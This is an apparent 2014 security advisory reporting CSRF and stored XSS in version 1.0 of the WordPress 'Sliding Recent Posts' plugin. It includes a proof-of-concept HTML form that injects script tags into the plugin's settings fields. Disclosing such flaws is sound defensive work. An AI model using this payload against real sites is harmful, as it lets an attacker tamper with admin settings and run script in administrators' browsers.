Home / exploits WordPress Sliding Recent Posts 1.0 CSRF / XSS
Posted on 13 December 2014
Title: WordPress 'Sliding Recent Posts' plugin - CSRF/XSS Version: 1.0 Author: Morten Nørtoft, Kenneth Jepsen, Mikkel Vej Date: 2014/12/12 Download: https://wordpress.org/plugins/sliding-recent-posts/ Notified WordPress: 2014/11/27 ---------------------------------------------------------------- ## Description: ---------------------------------------------------------------- This plugin displays a widget on your site that will slide into the screen when you click on it and it will display a list of recent posts with thumbnails ## CSRF: ---------------------------------------------------------------- It is possible to change the plugins admin settings by tricking a logged in admin to visit a crafted page. ## Stored XSS: ---------------------------------------------------------------- Settings data from the admin page is stored unsanitized and shown on the plugin's admin page. This allows an attacker to perform XSS through the settings fields. PoC: Log in as admin and then submit the following form. <form method="POST" action="http://[DOMAIN]/wp-admin/admin.php?page=sliding-recent-posts.php"> <input type="text" name="num_posts" value="3"><br /> <input type="text" name="position" value=""><script>alert(1)</script>"><br /> <input type="text" name="background_color" value="#798746"/><script>alert(2)</script>"><br /> <input type="text" name="font_color" value="#ffffff"><br /> <input type="text" name="ll__opt[disable]" value="Save"><br /> <input type="text" name="srp_save" value="save"><br /> <input type="submit"> </form> ## Solution ---------------------------------------------------------------- No fix have been released. WordPress have been notified and the plugin has been closed until it is updated.
